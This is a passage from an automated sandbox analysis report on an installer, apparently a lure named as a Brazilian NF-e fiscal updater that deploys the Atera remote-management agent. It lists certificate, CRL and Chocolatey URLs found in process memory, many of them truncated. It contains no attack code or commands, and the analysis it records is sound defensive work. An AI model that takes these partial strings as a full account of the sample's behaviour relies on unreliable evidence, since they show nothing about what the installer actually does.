Source: AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt68
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1847212366.000002167ADF0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5006AA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723FC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723BF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A5727E0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A57281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AB85000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100727000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002D.00000002.2794634831.0000019F9C022000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: AteraAgent.exe, 00000018.00000002.2761360886.000002517A82A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5006AA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2393257978.000001A571F34000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723FC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2393257978.000001A571F41000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723BF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A5727E0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A57232D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A572300000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A57236D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.2038194012.0000028A6E44B000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2761360886.000002517A740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/Digiv
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp, Atualizador_Fiscal_NFe_37882912.msi	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cdn.rawgit.com/chocolatey/chocolatey-coreteampackages/50fd97744110dcbce1acde889c0870599c9d558
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://community.chocolatey.
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://community.chocolatey.(
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://community.chocolatey.8
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB30EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://community.chocolatey.org
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB302C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3078000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3028000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB334B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3024000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB307C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3357000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://community.chocolatey.org/api/v2/
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://community.chocolatey.org/api/v2/Packages(Id=
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB30EF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3074000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3028000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3024000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB307C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://community.chocolatey.org/api/v2/Search?searchTerm=
Source: AteraAgent.exe, 0000000E.00000002.2400417114.000001A5724EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.defence.gov.au/pki0
Source: rundll32.exe, 00000004.00000002.1767433226.0000000007443000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: AteraAgent.exe, 0000000C.00000002.1847212366.000002167AEE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/
Source: AteraAgent.exe, 0000000C.00000002.1847212366.000002167AEE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/:
Source: AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCe
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5006AA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2385596719.000001A570E25000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723FC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723BF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A5727E0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A57239F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2748747455.0000025179586000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AB00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2761360886.000002517A7B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCC064000.00000002.00000001.01000000.00000044.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp, Atualizador_Fiscal_NFe_37882912.msi	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp, Atualizador_Fiscal_NFe_37882912.msi	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: AteraAgent.exe, 0000000C.00000002.1848517334.000002167B8ED000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1847212366.000002167AE73000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2385596719.000001A570E86000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A57236D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2748747455.00000251795E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
Source: AteraAgent.exe, 0000000C.00000002.1844841948.00000216000C9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1847212366.000002167ADF0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1848517334.000002167B90B000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5006AA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723FC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003AB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2393257978.000001A571F41000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A5724D3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5007A7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A5727E0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A57232D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5002C4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100796000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: AteraAgent.exe, 0000000E.00000002.2397219667.000001A57236D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl3Z
Source: AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl;
Source: AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlT;
Source: AteraAgent.exe, 0000000E.00000002.2397219667.000001A57232D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2748747455.00000251795E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlhttp://crl4.digicert.co
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1847212366.000002167ADF0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5006AA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723FC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723BF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A5727E0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A57281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AB85000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100727000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002D.00000002.2794634831.0000019F9C022000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: AteraAgent.exe, 0000000C.00000002.1847212366.000002167AEE6000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1847212366.000002167ADF0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A57232D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A57239F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AB5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100727000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2293365462.00000150D7BD2000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001F.00000002.2151824519.000002249A95D000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001F.00000003.2148913290.000002249A95C000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.3012686811.0000023072BB6000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.3012686811.0000023072B5F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2220576029.00000247F9AB4000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2376794012.000001C2ECEA0000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2555247568.000001F16354C000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2551521304.000001F16342E000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000002C.00000002.2453999578.000001A120C0C000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000002C.00000003.2450525308.000001A120C0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002D.00000002.2794634831.0000019F9C022000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002D.00000002.2794634831.0000019F9C01E000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002D.00000002.2785759950.0000019F9B69B000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002D.00000002.2792659060.0000019F9BDE0000.00000004.00000020.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000031.00000002.3208734070.0000021F3DE16000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000033.00000002.2696699490.00000256F2314000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3065551701.0000011CCB6F4000.00000004.00000020.00020000.00000000.sdmp, AgentPackageHeartbeat.exe, 00000039.00000002.2582807916.000002A34B6CA000.00000004.00000020.00020000.00000000.sdmp, AgentPackageHeartbeat.exe, 00000039.00000002.2582807916.000002A34B6AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: AteraAgent.exe, 0000000C.00000002.1847212366.000002167AEBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl7
Source: AteraAgent.exe, 0000000C.00000002.1847212366.000002167AE73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl?
Source: AteraAgent.exe, 0000000C.00000002.1847212366.000002167ADF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crlL
Source: AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crlZ
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp, Atualizador_Fiscal_NFe_37882912.msi	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCC064000.00000002.00000001.01000000.00000044.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp, Atualizador_Fiscal_NFe_37882912.msi	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
